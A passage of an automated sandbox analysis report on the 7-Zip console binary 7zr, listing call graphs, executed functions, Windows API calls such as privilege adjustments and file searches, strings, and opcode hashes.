71fa3f 22 API calls 2 library calls 77123->77160 77124 7204b8 77126 7204e8 77124->77126 77129 7204cd 77124->77129 77125->77124 77161 72159a malloc _CxxThrowException free ctype 77125->77161 77163 727c4a malloc _CxxThrowException free ctype 77126->77163 77162 71fff0 9 API calls 2 library calls 77129->77162 77130 72043e 77158 71f93c 7 API calls 2 library calls 77130->77158 77132 720492 77135 71f047 _CxxThrowException 77132->77135 77134->77130 77157 71ef67 _CxxThrowException 77134->77157 77135->77125 77137 7204db 77142 71f047 _CxxThrowException 77137->77142 77139 7204e3 77144 72054a 77139->77144 77165 71ef67 _CxxThrowException 77139->77165 77140 720446 77141 72046d 77140->77141 77159 71ef67 _CxxThrowException 77140->77159 77143 71f047 _CxxThrowException 77141->77143 77142->77139 77143->77123 77144->77109 77145 7204f3 77145->77139 77164 6e089e malloc _CxxThrowException free _CxxThrowException memcpy 77145->77164 77149->77089 77150->77094 77151->77099 77152->77103 77153->77100 77154->77104 77155->77107 77156->77103 77157->77130 77158->77140 77159->77141 77160->77132 77161->77124 77162->77137 77163->77145 77164->77145 77165->77144 77166 6fd3c2 77167 6fd3e9 77166->77167 77168 6d965d VariantClear 77167->77168 77169 6fd42a 77168->77169 77170 6fd883 2 API calls 77169->77170 77171 6fd4b1 77170->77171 77257 6f8d4a 77171->77257 77174 6f8b05 VariantClear 77177 6fd4e3 77174->77177 77175 6f2a72 2 API calls 77176 6fd54c 77175->77176 77178 6d2fec 3 API calls 77176->77178 77177->77175 77179 6fd594 77178->77179 77180 6fd5cd 77179->77180 77181 6fd742 77179->77181 77183 6fd7d9 77180->77183 77274 6f9317 77180->77274 77289 6fcd49 malloc _CxxThrowException free 77181->77289 77292 6d1e40 free 77183->77292 77184 6fd754 77187 6d2fec 3 API calls 77184->77187 77190 6fd763 77187->77190 77188 6fd7e1 77293 6d1e40 free 77188->77293 77290 6d1e40 free 77190->77290 77192 6fd5f1 77195 7104d2 5 API calls 77192->77195 77194 6fd7e9 77198 6f326b free 77194->77198 77196 6fd5f9 77195->77196 77280 6fe332 77196->77280 77197 6fd76b 77291 6d1e40 free 77197->77291 77208 6fd69a 77198->77208 77202 6fd773 77204 6f326b free 77202->77204 77204->77208 77205 6fd610 77287 6d1e40 free 77205->77287 77207 6fd618 77209 6f326b free 77207->77209 77210 6fd2a8 77209->77210 77210->77208 77232 6fd883 77210->77232 77213 6d2fec 3 API calls 77214 6fd361 77213->77214 77215 6d2fec 3 API calls 77214->77215 77216 6fd36d 77215->77216 77244 6fd0e1 77216->77244 77218 6fd380 77219 6fd38a 77218->77219 77220 6fd665 77218->77220 77221 7104d2 5 API calls 77219->77221 77222 6fd68b 77220->77222 77288 6fcd49 malloc _CxxThrowException free 77220->77288 77224 6fd392 77221->77224 77223 6f326b free 77222->77223 77223->77208 77226 6fe332 2 API calls 77224->77226 77228 6fd3a1 77226->77228 77227 6fd67c 77229 6d2fec 3 API calls 77227->77229 77230 6f326b free 77228->77230 77229->77222 77231 6fd3b0 77230->77231 77233 6fd88d __EH_prolog 77232->77233 77234 6d2e04 2 API calls 77233->77234 77235 6fd8c6 77234->77235 77236 6d2e04 2 API calls 77235->77236 77237 6fd8d2 77236->77237 77238 6d2e04 2 API calls 77237->77238 77239 6fd8de 77238->77239 77240 6f2b63 2 API calls 77239->77240 77241 6fd8fa 77240->77241 77242 6f2b63 2 API calls 77241->77242 77243 6fd34f 77242->77243 77243->77213 77245 6fd0eb __EH_prolog 77244->77245 77246 6fd10b 77245->77246 77247 6fd138 77245->77247 77248 6d1e0c ctype 2 API calls 77246->77248 77249 6d1e0c ctype 2 API calls 77247->77249 77256 6fd112 77247->77256 77248->77256 77250 6fd14b 77249->77250 77251 6d2fec 3 API calls 77250->77251 77252 6fd17b 77251->77252 77294 6d7b41 28 API calls 77252->77294 77254 6fd18a 77254->77256 77295 6d757d GetLastError 77254->77295 77256->77218 77262 6f8d54 __EH_prolog 77257->77262 77258 6f8e09 77260 6d965d VariantClear 77258->77260 77259 6f8e15 77261 6f8e2d 77259->77261 77263 6f8e5e 77259->77263 77264 6f8e21 77259->77264 77271 6f8e11 77260->77271 77261->77263 77269 6f8e2b 77261->77269 77272 6f8da4 77262->77272 77296 6d2b55 malloc _CxxThrowException free _CxxThrowException ctype 77262->77296 77265 6d965d VariantClear 77263->77265 77297 6d3097 malloc _CxxThrowException free SysStringLen ctype 77264->77297 77265->77271 77267 6d965d VariantClear 77270 6f8e47 77267->77270 77269->77267 77270->77271 77298 6f8e7c 6 API calls __EH_prolog 77270->77298 77271->77174 77272->77258 77272->77259 77272->77271 77277 6f9321 __EH_prolog 77274->77277 77275 6d965d VariantClear 77276 6f93d0 77275->77276 77276->77183 77276->77192 77279 6f9360 77277->77279 77299 6d9686 VariantClear 77277->77299 77279->77275 77281 6fe33c __EH_prolog 77280->77281 77282 6d1e0c ctype 2 API calls 77281->77282 77283 6fe34a 77282->77283 77284 6fd608 77283->77284 77300 6fe3d1 malloc _CxxThrowException __EH_prolog 77283->77300 77286 6d1e40 free 77284->77286 77286->77205 77287->77207 77288->77227 77289->77184 77290->77197 77291->77202 77292->77188 77293->77194 77294->77254 77295->77256 77296->77272 77297->77269 77298->77271 77299->77279 77300->77284 77301 6e1ade 77302 6e1ae8 __EH_prolog 77301->77302 77352 6d13f5 77302->77352 77305 6e1b32 6 API calls 77307 6e1b8d 77305->77307 77314 6e1bf8 77307->77314 77370 6e1ea4 9 API calls 77307->77370 77308 6e1b24 _CxxThrowException 77308->77305 77310 6e1bdf 77311 6d27bb 3 API calls 77310->77311 77312 6e1bec 77311->77312 77371 6d1e40 free 77312->77371 77316 6e1c89 77314->77316 77372 6f1d73 5 API calls __EH_prolog 77314->77372 77366 6e1eb9 77316->77366 77320 6e1cb2 _CxxThrowException 77320->77316 77353 6d13ff __EH_prolog 77352->77353 77354 6f7ebb free 77353->77354 77355 6d142b 77354->77355 77356 6d1438 77355->77356 77373 6d1212 free ctype 77355->77373 77358 6d1e0c ctype 2 API calls 77356->77358 77362 6d144d 77358->77362 77359 6d14f4 77359->77305 77369 6f1d73 5 API calls __EH_prolog 77359->77369 77360 7104d2 5 API calls 77360->77362 77362->77359 77362->77360 77364 6d1507 77362->77364 77374 6d1265 5 API calls 2 library calls 77362->77374 77375 6d1524 malloc _CxxThrowException __EH_prolog ctype 77362->77375 77365 6d2fec 3 API calls 77364->77365 77365->77359 77376 6d9313 GetCurrentProcess OpenProcessToken 77366->77376 77369->77308 77370->77310 77371->77314 77372->77320 77373->77356 77374->77362 77375->77362 77377 6d933a LookupPrivilegeValueW 77376->77377 77378 6d9390 77376->77378 77379 6d934c AdjustTokenPrivileges 77377->77379 77380 6d9382 77377->77380 77379->77380 77381 6d9372 GetLastError 77379->77381 77382 6d9385 CloseHandle 77380->77382 77381->77382 77382->77378 77383 710343 77388 71035f 77383->77388 77386 710358 77389 710369 __EH_prolog 77388->77389 77405 6e139e 77389->77405 77394 710143 ctype free 77395 71039a 77394->77395 77415 6d1e40 free 77395->77415 77397 7103a2 77416 6d1e40 free 77397->77416 77399 7103aa 77417 7103d8 77399->77417 77404 6d1e40 free 77404->77386 77406 6e13ae 77405->77406 77407 6e13b3 77405->77407 77433 767ea0 SetEvent GetLastError 77406->77433 77409 7101c4 77407->77409 77412 7101ce __EH_prolog 77409->77412 77410 710203 77434 6d1e40 free 77410->77434 77412->77410 77435 6d1e40 free 77412->77435 77413 71020b 77413->77394 77415->77397 77416->77399 77418 7103e2 __EH_prolog 77417->77418 77419 6e139e ctype 2 API calls 77418->77419 77420 7103fb 77419->77420 77436 767d50 77420->77436 77422 710403 77423 767d50 ctype 2 API calls 77422->77423 77424 71040b 77423->77424 77425 767d50 ctype 2 API calls 77424->77425 77426 7103b7 77425->77426 77427 71004a 77426->77427 77428 710054 __EH_prolog 77427->77428 77442 6d1e40 free 77428->77442 77430 710067 77443 6d1e40 free 77430->77443 77432 71006f 77432->77386 77432->77404 77433->77407 77434->77413 77435->77412 77437 767d59 CloseHandle 77436->77437 77440 767d7b 77436->77440 77438 767d64 GetLastError 77437->77438 77439 767d75 77437->77439 77438->77440 77441 767d6e 77438->77441 77439->77440 77440->77422 77441->77422 77442->77430 77443->77432 77444 756bc6 77445 756bcd 77444->77445 77446 756bca 77444->77446 77445->77446 77447 756bd1 malloc 77445->77447 77447->77446 77448 6db5d9 77449 6db5e6 77448->77449 77453 6db5f7 77448->77453 77449->77453 77454 6db5fe 77449->77454 77455 6db608 __EH_prolog 77454->77455 77461 756a40 VirtualFree 77455->77461 77457 6db63d 77458 6d764c CloseHandle 77457->77458 77459 6db5f1 77458->77459 77460 6d1e40 free 77459->77460 77460->77453 77461->77457 77462 6d42d1 77463 6d42bd 77462->77463 77464 6d42c5 77463->77464 77465 6d1e0c ctype 2 API calls 77463->77465 77465->77464

                            Executed Functions

                            Function 006D9313 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1073 6d9313-6d9338 GetCurrentProcess OpenProcessToken 1074 6d933a-6d934a LookupPrivilegeValueW 1073->1074 1075 6d9390 1073->1075 1076 6d934c-6d9370 AdjustTokenPrivileges 1074->1076 1077 6d9382 1074->1077 1078 6d9393-6d9398 1075->1078 1076->1077 1079 6d9372-6d9380 GetLastError 1076->1079 1080 6d9385-6d938e CloseHandle 1077->1080 1079->1080 1080->1078
                            APIs
                            • GetCurrentProcess.KERNEL32(00000020,006E1EC5,?,7597AB50,?,?,?,?,006E1EC5,006E1CEF), ref: 006D9329
                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,006E1EC5,006E1CEF), ref: 006D9330
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 006D9342
                            • AdjustTokenPrivileges.KERNELBASE(006E1EC5,00000000,?,00000000,00000000,00000000), ref: 006D9368
                            • GetLastError.KERNEL32 ref: 006D9372
                            • CloseHandle.KERNELBASE(006E1EC5,?,?,?,?,006E1EC5,006E1CEF), ref: 006D9388
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeRestorePrivilege
                            • API String ID: 3398352648-1684392131
                            • Opcode ID: 43515da784a572333b3cef4fbb16d8775d4ef2d275ec5eac47ab4f7710be33de
                            • Instruction ID: 2788c1e905c99e3cfe822e0b3ad1996dc8c756e6b26222feb7441fca7c8b4429
                            • Opcode Fuzzy Hash: 43515da784a572333b3cef4fbb16d8775d4ef2d275ec5eac47ab4f7710be33de
                            • Instruction Fuzzy Hash: C401C076945218BBDB115BF19C49BDE7F7CAF09380F044169E445E2280D6788689C7F0
                            Function 006E3D66 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1081 6e3d66-6e3d9c call 76fb10 GetCurrentProcess call 6e3e04 OpenProcessToken 1086 6e3d9e-6e3dbe LookupPrivilegeValueW 1081->1086 1087 6e3de3-6e3dfe call 6e3e04 1081->1087 1086->1087 1088 6e3dc0-6e3dd3 AdjustTokenPrivileges 1086->1088 1088->1087 1090 6e3dd5-6e3de1 GetLastError 1088->1090 1090->1087
                            APIs
                            • __EH_prolog.LIBCMT ref: 006E3D6B
                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3D7D
                            • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3D94
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 006E3DB6
                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3DCB
                            • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 006E3DD5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeSecurityPrivilege
                            • API String ID: 3475889169-2333288578
                            • Opcode ID: ad68ae649582672bb2daf7346672afd80fbdbf429d08a12433c7f04845adab21
                            • Instruction ID: 69729fdb929a203dc92995b245479c54860cdc40f61e8be02cf2974861164874
                            • Opcode Fuzzy Hash: ad68ae649582672bb2daf7346672afd80fbdbf429d08a12433c7f04845adab21
                            • Instruction Fuzzy Hash: C01130B19412299FDB11EFA5DC89AFEFB7DFB08384F00452DE416E2290D7348E48CA64
                            Function 007181EC Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 995COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 007181F1
                              • Part of subcall function 0071F749: _CxxThrowException.MSVCRT(?,00784A58), ref: 0071F792
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ExceptionH_prologThrow
                            • String ID:
                            • API String ID: 461045715-3916222277
                            • Opcode ID: 19c3597da83c7d2649022c780480e729c2fde139c3c9999db6a84dafbcdbbb0b
                            • Instruction ID: da4324a9a0d2ba840483147f703b01c8846e62991029149b927d811eb3c89213
                            • Opcode Fuzzy Hash: 19c3597da83c7d2649022c780480e729c2fde139c3c9999db6a84dafbcdbbb0b
                            • Instruction Fuzzy Hash: 5A929030900249DFDF55DFA8C844BEEBBB1BF09304F244199E855AB292DB78DD85CB62
                            Function 006D6868 Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D686D
                              • Part of subcall function 006D6848: FindClose.KERNELBASE(00000000,?,006D6880), ref: 006D6853
                            • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 006D68A5
                            • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 006D68DE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: Find$FileFirst$CloseH_prolog
                            • String ID:
                            • API String ID: 3371352514-0
                            • Opcode ID: 27c631789735c8b83569836aae8723cc390c40ab590a915973511d74ab8f6f3a
                            • Instruction ID: 5cdad4d9eb36358a10c4162f7aa781c9240da8efa95499ee2d45b621773dbd6f
                            • Opcode Fuzzy Hash: 27c631789735c8b83569836aae8723cc390c40ab590a915973511d74ab8f6f3a
                            • Instruction Fuzzy Hash: 6F11D031C00209DBCF10EF64C8559EDB77AEF54324F20422EE96197392DB328E86EB50
                            Function 0070A013 Relevance: 60.2, APIs: 15, Strings: 19, Instructions: 690COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 70a013-70a01a 1 70a020-70a02d call 6e1ac8 0->1 2 70a37a-70a544 call 7104d2 call 6d1524 call 7104d2 call 6d1524 call 6d1e0c 0->2 7 70a033-70a03a 1->7 8 70a22e-70a235 1->8 61 70a551 2->61 62 70a546-70a54f call 70b0fa 2->62 12 70a054-70a089 call 7092d3 7->12 13 70a03c-70a042 7->13 10 70a367-70a375 call 70b55f 8->10 11 70a23b-70a24d call 70b4f6 8->11 27 70ac23-70ac2a 10->27 28 70a259-70a2fb call 6f7ebb call 6d27bb call 6d26dd call 6f3d70 call 70ad99 call 6d27bb 11->28 29 70a24f-70a253 11->29 25 70a099 12->25 26 70a08b-70a091 12->26 13->12 17 70a044-70a04f call 6d30ea 13->17 17->12 32 70a09d-70a0de call 6d2fec call 70b369 25->32 26->25 31 70a093-70a097 26->31 33 70ac3a-70ac66 call 70b96d call 6d1e40 call 6f3247 27->33 34 70ac2c-70ac33 27->34 94 70a303-70a362 call 70b6ab call 702db9 call 6d1e40 * 2 call 70bff8 28->94 95 70a2fd 28->95 29->28 31->32 57 70a0e0-70a0e4 32->57 58 70a0ea-70a0fa 32->58 71 70ac68-70ac6a 33->71 72 70ac6e-70acb5 call 6d1e40 call 6d11c2 call 70be0c call 702db9 33->72 34->33 39 70ac35 34->39 44 70ac35 call 70b988 39->44 44->33 57->58 63 70a0fc-70a102 58->63 64 70a10d 58->64 68 70a553-70a55c 61->68 62->68 63->64 69 70a104-70a10b 63->69 70 70a114-70a19e call 6d2fec call 6f7ebb call 70ad99 64->70 76 70a564-70a5c1 call 6d2fec call 70b277 68->76 77 70a55e-70a560 68->77 69->70 102 70a1a2 call 6ff8e0 70->102 71->72 96 70a5c3-70a5c7 76->96 97 70a5cd-70a652 call 70ad06 call 70bf3e call 6e3a29 call 6d2e04 call 6f4345 76->97 77->76 94->27 95->94 96->97 137 70a654-70a671 call 6f375c call 70b96d 97->137 138 70a676-70a6c8 call 6f2096 97->138 106 70a1a7-70a1b1 102->106 110 70a1c0-70a1c9 106->110 111 70a1b3-70a1bb call 70c7d7 106->111 116 70a1d1-70a229 call 70b6ab call 702db9 call 6d1e40 call 70bfa4 call 70940b 110->116 117 70a1cb 110->117 111->110 116->27 117->116 137->138 142 70a6cd-70a6d6 138->142 146 70a6e2-70a6e5 142->146 147 70a6d8-70a6dd call 70c7d7 142->147 150 70a6e7-70a6ee 146->150 151 70a72e-70a73a 146->151 147->146 154 70a6f0-70a71d call 6d1fa0 fputs call 6d1fa0 call 6d1fb3 call 6d1fa0 150->154 155 70a722-70a725 150->155 152 70a73c-70a74a call 6d1fa0 151->152 153 70a79e-70a7aa 151->153 167 70a755-70a799 fputs call 6d2201 call 6d1fa0 fputs call 6d2201 call 6d1fa0 152->167 168 70a74c-70a753 152->168 156 70a7d9-70a7e5 153->156 157 70a7ac-70a7b2 153->157 154->155 155->151 158 70a727 155->158 163 70a7e7-70a7ed 156->163 164 70a818-70a81a 156->164 157->156 161 70a7b4-70a7d4 fputs call 6d2201 call 6d1fa0 157->161 158->151 161->156 169 70a7f3-70a813 fputs call 6d2201 call 6d1fa0 163->169 170 70a899-70a8a5 163->170 164->170 172 70a81c-70a82b 164->172 167->153 168->153 168->167 169->164 176 70a8a7-70a8ad 170->176 177 70a8e9-70a8ed 170->177 179 70a851-70a85d 172->179 180 70a82d-70a84c fputs call 6d2201 call 6d1fa0 172->180 183 70a8ef 176->183 187 70a8af-70a8c2 call 6d1fa0 176->187 182 70a8f6-70a8f8 177->182 177->183 179->170 181 70a85f-70a872 call 6d1fa0 179->181 180->179 181->170 206 70a874-70a894 fputs call 6d2201 call 6d1fa0 181->206 191 70a8fe-70a90a 182->191 192 70aaaf-70aaeb call 6f43b3 call 6d1e40 call 70c104 call 70ad82 182->192 183->182 187->183 211 70a8c4-70a8e4 fputs call 6d2201 call 6d1fa0 187->211 201 70a910-70a91f 191->201 202 70aa73-70aa89 call 6d1fa0 191->202 248 70aaf1-70aaf7 192->248 249 70ac0b-70ac1e call 702db9 * 2 192->249 201->202 208 70a925-70a929 201->208 202->192 218 70aa8b-70aaaa fputs call 6d2201 call 6d1fa0 202->218 206->170 208->192 214 70a92f-70a93d 208->214 211->177 222 70a96a-70a971 214->222 223 70a93f-70a964 fputs call 6d2201 call 6d1fa0 214->223 218->192 230 70a973-70a97a 222->230 231 70a98f-70a9a8 fputs call 6d2201 222->231 223->222 230->231 232 70a97c-70a982 230->232 239 70a9ad-70a9bd call 6d1fa0 231->239 232->231 237 70a984-70a98d 232->237 237->231 242 70aa06-70aa1f fputs call 6d2201 237->242 239->242 252 70a9bf-70aa01 fputs call 6d2201 call 6d1fa0 fputs call 6d2201 call 6d1fa0 239->252 250 70aa24-70aa29 call 6d1fa0 242->250 248->249 249->27 257 70aa2e-70aa4b fputs call 6d2201 250->257 252->242 262 70aa50-70aa5b call 6d1fa0 257->262 262->192 268 70aa5d-70aa71 call 6d1fa0 call 70710e 262->268 268->192
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs$ExceptionThrow
                            • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&y$p&y$N
                            • API String ID: 3665150552-3380954897
                            • Opcode ID: 0f8c811c1b92b0bd23ddd329b390ec2a867fdcf4a1a33ef1e72f0d97d01cfeba
                            • Instruction ID: 2cf2f94a9798446a9bb367b5b1956129006a5ddfb41e2dee2c1192a50b9994e7
                            • Opcode Fuzzy Hash: 0f8c811c1b92b0bd23ddd329b390ec2a867fdcf4a1a33ef1e72f0d97d01cfeba
                            • Instruction Fuzzy Hash: 30528C31D00258EFCF26EBA4C895BEDBBF6AF54300F10419EE44967291DB786A85CF15
                            Function 0070A42C Relevance: 60.0, APIs: 15, Strings: 19, Instructions: 503COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 274 70a42c-70a433 275 70a435-70a444 fputs call 6d1fa0 274->275 276 70a449-70a4df call 70545d call 6d2e04 call 6f1858 call 6d1e40 274->276 275->276 286 70a4e1-70a4e9 call 70c7d7 276->286 287 70a4ee-70a4f1 276->287 286->287 288 70a4f3-70a4fa 287->288 289 70a50e-70a520 call 70c73e 287->289 288->289 291 70a4fc-70a509 call 7057fb 288->291 295 70a526-70a544 call 6d1e0c 289->295 296 70ac0b-70ac2a call 702db9 * 2 289->296 291->289 304 70a551 295->304 305 70a546-70a54f call 70b0fa 295->305 306 70ac3a-70ac66 call 70b96d call 6d1e40 call 6f3247 296->306 307 70ac2c-70ac33 296->307 309 70a553-70a55c 304->309 305->309 328 70ac68-70ac6a 306->328 329 70ac6e-70acb5 call 6d1e40 call 6d11c2 call 70be0c call 702db9 306->329 307->306 310 70ac35 call 70b988 307->310 313 70a564-70a5c1 call 6d2fec call 70b277 309->313 314 70a55e-70a560 309->314 310->306 324 70a5c3-70a5c7 313->324 325 70a5cd-70a652 call 70ad06 call 70bf3e call 6e3a29 call 6d2e04 call 6f4345 313->325 314->313 324->325 348 70a654-70a671 call 6f375c call 70b96d 325->348 349 70a676-70a6d6 call 6f2096 325->349 328->329 348->349 355 70a6e2-70a6e5 349->355 356 70a6d8-70a6dd call 70c7d7 349->356 358 70a6e7-70a6ee 355->358 359 70a72e-70a73a 355->359 356->355 362 70a6f0-70a71d call 6d1fa0 fputs call 6d1fa0 call 6d1fb3 call 6d1fa0 358->362 363 70a722-70a725 358->363 360 70a73c-70a74a call 6d1fa0 359->360 361 70a79e-70a7aa 359->361 375 70a755-70a799 fputs call 6d2201 call 6d1fa0 fputs call 6d2201 call 6d1fa0 360->375 376 70a74c-70a753 360->376 364 70a7d9-70a7e5 361->364 365 70a7ac-70a7b2 361->365 362->363 363->359 366 70a727 363->366 371 70a7e7-70a7ed 364->371 372 70a818-70a81a 364->372 365->364 369 70a7b4-70a7d4 fputs call 6d2201 call 6d1fa0 365->369 366->359 369->364 377 70a7f3-70a813 fputs call 6d2201 call 6d1fa0 371->377 378 70a899-70a8a5 371->378 372->378 380 70a81c-70a82b 372->380 375->361 376->361 376->375 377->372 384 70a8a7-70a8ad 378->384 385 70a8e9-70a8ed 378->385 387 70a851-70a85d 380->387 388 70a82d-70a84c fputs call 6d2201 call 6d1fa0 380->388 391 70a8ef 384->391 395 70a8af-70a8c2 call 6d1fa0 384->395 390 70a8f6-70a8f8 385->390 385->391 387->378 389 70a85f-70a872 call 6d1fa0 387->389 388->387 389->378 414 70a874-70a894 fputs call 6d2201 call 6d1fa0 389->414 399 70a8fe-70a90a 390->399 400 70aaaf-70aaeb call 6f43b3 call 6d1e40 call 70c104 call 70ad82 390->400 391->390 395->391 419 70a8c4-70a8e4 fputs call 6d2201 call 6d1fa0 395->419 409 70a910-70a91f 399->409 410 70aa73-70aa89 call 6d1fa0 399->410 400->296 456 70aaf1-70aaf7 400->456 409->410 416 70a925-70a929 409->416 410->400 426 70aa8b-70aaaa fputs call 6d2201 call 6d1fa0 410->426 414->378 416->400 422 70a92f-70a93d 416->422 419->385 430 70a96a-70a971 422->430 431 70a93f-70a964 fputs call 6d2201 call 6d1fa0 422->431 426->400 438 70a973-70a97a 430->438 439 70a98f-70a9a8 fputs call 6d2201 430->439 431->430 438->439 440 70a97c-70a982 438->440 447 70a9ad-70a9bd call 6d1fa0 439->447 440->439 445 70a984-70a98d 440->445 445->439 450 70aa06-70aa4b fputs call 6d2201 call 6d1fa0 fputs call 6d2201 445->450 447->450 458 70a9bf-70aa01 fputs call 6d2201 call 6d1fa0 fputs call 6d2201 call 6d1fa0 447->458 466 70aa50-70aa5b call 6d1fa0 450->466 456->296 458->450 466->400 472 70aa5d-70aa71 call 6d1fa0 call 70710e 466->472 472->400
                            APIs
                            • fputs.MSVCRT(Scanning the drive for archives:), ref: 0070A43E
                              • Part of subcall function 006D1FA0: fputc.MSVCRT ref: 006D1FA7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputcfputs
                            • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&y$p&y$!"$N
                            • API String ID: 269475090-3867409031
                            • Opcode ID: e366acc529e3c89729b1cf218e54cc2aaeacc9868a3cd61e9bccf99a6655d0c1
                            • Instruction ID: 99297a9c700a0eb8fa5bc565ab2068ab0cc880e3dba9ee790aeb3eae33641e3e
                            • Opcode Fuzzy Hash: e366acc529e3c89729b1cf218e54cc2aaeacc9868a3cd61e9bccf99a6655d0c1
                            • Instruction Fuzzy Hash: 8A227A31E00248EFDF26EBA4C856BEDBBF6AF54300F14419EE44967291DB786A84CF15
                            Function 0070993D Relevance: 47.8, APIs: 16, Strings: 11, Instructions: 569COMMON
                            Download Yara Rule

